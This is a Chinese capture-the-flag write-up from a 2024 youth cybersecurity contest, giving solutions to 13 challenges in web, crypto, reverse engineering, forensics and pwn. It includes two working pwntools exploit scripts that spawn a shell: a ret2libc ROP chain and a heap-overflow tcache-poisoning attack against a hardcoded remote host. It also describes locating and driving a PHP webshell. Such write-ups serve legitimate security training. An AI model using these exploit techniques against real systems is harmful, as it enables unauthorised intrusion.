SfTian 2024年强网杯青少年专项赛线上WP ## 一、 战队信息 战队名称:半亩塘的一只鹅 战队排名:7 ## 二、 解题情况  ## 三、 解题过程 ### 1 Classics #### 操作内容: 拿到附件看到是cyberchef通过多层编码得到的密文,根据其逆着来就可以了  #### flag值: flag{2834d185-a1da-4fb1-8bac-59076eb6a634} ### 2 签到漫画 #### 操作内容: 下发容器看漫画然后会发现每个漫画最后面都有一部分的二维码  找在线网站拼接之后可以拿到flag  #### flag值: flag{youthful_and_upward} ### 3 ezGetFlag #### 操作内容: 进入容器网页根据下面You have x more …一直点然后会给提示   把button的form中的method的GET改成POST就行  #### flag值: flag{75e71ee8-fa7d-4527-bffb-1f8554611db2} ### 4 clock_in #### 操作内容: 这题是ret2libc,先利用缓冲区漏洞溢出然后获取base地址构造ROP链,最后计算/bin/sh地址然后执行就可以了  #### 如该题使用自己编写的脚本代码请详细写出,不允许截图 ```python from pwn import * context(log_level='debug', arch='amd64') p = remote('ip', port) elf = ELF('./clock_in') libc = ELF('libc.so.6') def get_libc_base(): return u64(p.recvuntil("\x7f")[-6:].ljust(8, b'\x00')) def s(a): p.send(a) def sa(a, b): p.sendafter(a, b) def sl(a): p.sendline(a) def sla(a, b): p.sendlineafter(a, b) def inter(): p.interactive() def exp(): rdi = 0x000000004011c5 payload1 = b'a' * 0x48 payload1 += p64(rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x401253) sl(payload1) libc_base = get_libc_base() - libc.sym['puts'] libc.address = libc_base system = libc.sym['system'] bin_sh = next(libc.search(b'/bin/sh\x00')) payload2 = b'a' * 0x48 payload2 += p64(rdi) + p64(bin_sh) + p64(rdi + 1) + p64(system) sl(payload2) inter() exp() ``` #### flag值: flag{bb92f04b-7317-4202-bc48-cdc9f1df428e} ### 5 ezmath #### 操作内容: 这题拷打GPT o1拿到的,脚本看下面   ```python from Crypto.Util.number import inverse, long_to_bytes import sys n = 739243847275389709472067387827484120222494013590074140985399787562594529286597003777105115865446795908819036678700460141950875653695331369163361757157565377531721748744087900881582744902312177979298217791686598853486325684322963787498115587802274229739619528838187967527241366076438154697056550549800691528794136318856475884632511630403822825738299776018390079577728412776535367041632122565639036104271672497418509514781304810585503673226324238396489752427801699815592314894581630994590796084123504542794857800330419850716997654738103615725794629029775421170515512063019994761051891597378859698320651083189969905297963140966329378723373071590797203169830069428503544761584694131795243115146000564792100471259594488081571644541077283644666700962953460073953965250264401973080467760912924607461783312953419038084626809675807995463244073984979942740289741147504741715039830341488696960977502423702097709564068478477284161645957293908613935974036643029971491102157321238525596348807395784120585247899369773609341654908807803007460425271832839341595078200327677265778582728994058920387721181708105894076110057858324994417035004076234418186156340413169154344814582980205732305163274822509982340820301144418789572738830713925750250925049059 c = 229043746793674889024653533006701296308351926745769842802636384094759379740300534278302123222014817911580006421847607123049816103885365851535481716236688330600113899345346872012870482410945158758991441294885546642304012025685141746649427132063040233448959783730507539964445711789203948478927754968414484217451929590364252823034436736148936707526491427134910817676292865910899256335978084133885301776638189969716684447886272526371596438362601308765248327164568010211340540749408337495125393161427493827866434814073414211359223724290251545324578501542643767456072748245099538268121741616645942503700796441269556575769250208333551820150640236503765376932896479238435739865805059908532831741588166990610406781319538995712584992928490839557809170189205452152534029118700150959965267557712569942462430810977059565077290952031751528357957124339169562549386600024298334407498257172578971559253328179357443841427429904013090062097483222125930742322794450873759719977981171221926439985786944884991660612824458339473263174969955453188212116242701330480313264281033623774772556593174438510101491596667187356827935296256470338269472769781778576964130967761897357847487612475534606977433259616857569013270917400687539344772924214733633652812119743 e = 65537 # Public exponent l = 2331 # Define states states = list(range(7)) # 0 to 6 # Initialize transition table def get_next_state(s, b): if s == 1 or s == 2 or s == 3: # consecutive ones co = s if b == 1: co += 1 if co == 4: return -1 # invalid else: return co else: return 4 # start consecutive zeros elif s == 4 or s == 5 or s == 6: # consecutive zeros cz = s - 3 if b == 0: cz += 1 if cz == 4: return -1 # invalid else: return cz + 3 else: return 1 # start consecutive ones elif s == 0: # neutral state if b == 1: return 1 else: return 4 transition = {} for s in states: transition[s] = {} for b in [0, 1]: next_state = get_next_state(s, b) transition[s][b] = next_state # Initialize DP array DP = [ [0] * 7 for _ in range(2) ] DP[0][1] = 1 # Start with one '1' mod = None # Can be used if you want to compute modulo some number # Perform DP for pos in range(1, l - 1): curr = pos % 2 prev = (pos - 1) % 2 DP[curr] = [0] * 7 for s in states: count = DP[prev][s] if count == 0: continue for b in [0, 1]: next_s = transition[s][b] if next_s != -1: DP[curr][next_s] += count if mod: DP[curr][next_s] %= mod # Handle the last bit which is fixed as '1' total = 0 curr = (l - 2) % 2 for s in states: count = DP[curr][s] if count == 0: continue b = 1 # Last bit is '1' next_s = transition[s][b] if next_s != -1: total += count if mod: total %= mod key = total print(f"Computed key: {key}") # Now compute p and factor n from gmpy2 import next_prime p = int(next_prime(key)) q = n // p # Verify that n is indeed p * q assert p * q == n, "Failed to factor n correctly!" # Compute phi(n) phi = (p - 1) * (q -1) # Compute the private exponent d d = inverse(e, phi) # Decrypt the message m = pow(c, d, n) flag = long_to_bytes(m) print(f"Decrypted flag: {flag.decode()}") ``` #### flag值: flag{77310934-21fa-4ee4-a783-dc1865ebab28} ### 6 AliceAES #### 操作内容: 题目给了key和iv还要求用CRC的方式加密Hello Bob!,那么在cyberchef中操作即可   #### flag值: flag{add7fd70-c006-43b9-92b3-5a212b137108} ### 7 ezFindShell #### 操作内容: 下载[www.zip之后在Linux中用grep检索POST](http://www.zip之后在Linux中用grep检索POST)就可以找到马了 分析一句话得,e是通过GET方式传过去,还需要base64解密,POST作为POST参数直接扔过去   #### flag值: flag{e1a47208-a4f9-4e06-895d-0e46e54f6b7f} ### 8 whitepic #### 操作内容: 看十六进制是GIF,直接用StegSolve的分帧查看器查看拿到flag  #### flag值: flag{passion_is_the_greatest_teacher} ### 9 EnterGame #### 操作内容: IDA分析是chacha20加密,需要拿到密文和密钥   密钥为 ``` 0x38, 0x7f, 0xcb, 0xb4, 0xfc, 0x46, 0x13, 0x4f, 0x22, 0x27, 0x31, 0xc2, 0x2d, 0x53, 0x25, 0xb4, 0x58, 0x6f, 0x75, 0x74, 0x67, 0x20, 0x53, 0x74, 0x71, 0x65, 0x6e, 0x67, 0x73, 0x68, 0x65, 0x6e, 0x9a, 0xe4, 0x9e, 0xb8, 0x86, 0xcf, 0x69, 0x3f, 0xaa, 0xbc, 0x94, 0x90, 0x84, 0xdd, 0xfe, 0xff ``` 密文为 ``` 0x5e, 0x13, 0xaa, 0xd3, 0x87, 0x75, 0x2b, 0x7a, 0x1b, 0x16, 0x4, 0xa3, 0x49, 0x7e, 0x1d, 0xd2, 0x6b, 0x5d, 0x58, 0x40, 0x5e, 0x44, 0x63, 0x59, 0x48, 0x51, 0xd, 0x54, 0x5e, 0x58, 0x55, 0x58, 0xad, 0x82, 0xaf, 0xdc, 0xe7, 0xab, 0x58, 0x5d, 0xce, 0xc1, 0x8f, 0xa, 0x11, 0x7f ```  ```python key=[0x38, 0x7f, 0xcb, 0xb4, 0xfc, 0x46, 0x13, 0x4f, 0x22, 0x27, 0x31, 0xc2, 0x2d, 0x53, 0x25, 0xb4, 0x58, 0x6f, 0x75, 0x74, 0x67, 0x20, 0x53, 0x74, 0x71, 0x65, 0x6e, 0x67, 0x73, 0x68, 0x65, 0x6e, 0x9a, 0xe4, 0x9e, 0xb8, 0x86, 0xcf, 0x69, 0x3f, 0xaa, 0xbc, 0x94, 0x90, 0x84, 0xdd, 0xfe, 0xff] enc=[0x5e, 0x13, 0xaa, 0xd3, 0x87, 0x75, 0x2b, 0x7a, 0x1b, 0x16, 0x4, 0xa3, 0x49, 0x7e, 0x1d, 0xd2, 0x6b, 0x5d, 0x58, 0x40, 0x5e, 0x44, 0x63, 0x59, 0x48, 0x51, 0xd, 0x54, 0x5e, 0x58, 0x55, 0x58, 0xad, 0x82, 0xaf, 0xdc, 0xe7, 0xab, 0x58, 0x5d, 0xce, 0xc1, 0x8f, 0xa, 0x11, 0x7f] for i in range(len(enc)): print(chr(enc[i]^key[i]), end='') ``` #### flag值: flag{385915ad-8f32-49d0-94c3-0067f1dad1bd} ### 10 问卷 #### 操作内容: 写问卷拿flag  #### flag值: flag{thank_you_for_your_support} ### 11 删除后门用户2 #### 操作内容: Ssh登录之后ps -a可以看到有个b进程在跑,意义不明就直接kill掉  检查passwd发现backdoor用户,userdel -f backdoor即可  #### flag值: flag{51efce2c-9d54-4bac-bb7b-5ceecfaea2a0} ### 12 Flip_over #### 操作内容: 由于源码被混淆,直接从lib文件夹找到libnative-lib.so拖入IDA,查找字符串发现有个明文flag{ 出现在validateAndEncrypt还有一个memcpy的明文字符串   两个sub函数分别是RC4和DES加密拿到key,然后再跟着while的0x21进行异或运算,先跟着RC4和DES加密可以找到密钥 ``` 5915c13f409a7ae7a68bb6e3ee0d196db76dcae6da5f0d4bd60ab2deadaa95eb85b777c310bbcfcef7d222c9c4f9fcfbab32ea318155af79528e80afc3186050f1d840bbfc1b89a6 ``` 密文贴脸上了就是上面0x1E 0x58那个部分,丢到cyberchef  #### flag值: flag{b92d40df-840a-43a8-bdb4-5de79eca13f4} ### 13 journey_story #### 操作内容: 保护拉满!  拖入IDA可见多个子函数,是堆溢出,通过覆盖size构造堆叠,通过unsortedbin泄露libc后tcache poison打free hook然后写入/bin/sh地址getshell   ```python from pwn import * from pwncli import * from ctypes import * context(os='linux', arch='amd64', log_level='debug') libc = ELF('libc-2.31.so') elf = ELF('./journey_story') p = remote("39.106.48.123", 19369) def add(size, content): p.sendlineafter(b"option: ", b"1") p.sendlineafter(b"0xb0): ", str(hex(size)).encode()) p.sendlineafter(b"racters): ", content) def free(idx): p.sendlineafter(b"option: ", b"2") p.sendlineafter(b": ", str(idx)) def show(idx): p.sendlineafter(b"option: ", b"4") p.sendlineafter(b": ", str(idx)) def edit(idx, content): p.sendlineafter(b"option: ", b"3") p.sendlineafter(b": ", str(idx)) p.sendline(content) for i in range(7): add(0xb0, b'aaaa') for i in range(7): free(i) for i in range(6): add(0x28, b'aaaa') edit(0, b'b' * 0x28 + b'\xc1') free(1) add(0x28, b'\x00') show(2) libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook'] free_hook = libc_base + libc.sym['__free_hook'] p.sendline(b"10") for i in range(3): add(0x28, b'cccc') free(2) free(3) show(7) p.recvuntil(b"Story 7 (size 0x28): ") heap_base = u64(p.recv(8)) & 0xfffffffff000 edit(7, p64(free_hook) + b'\x0a') add(0x28, b'/bin/sh\x00') add(0x28, p64(libc_base + libc.sym["system"])) free(2) p.interactive() ``` #### flag值: flag{9d64fa26-eac0-4f23-9eae-b19fbe0ee18d} 取消回复 发表新评论 提交评论
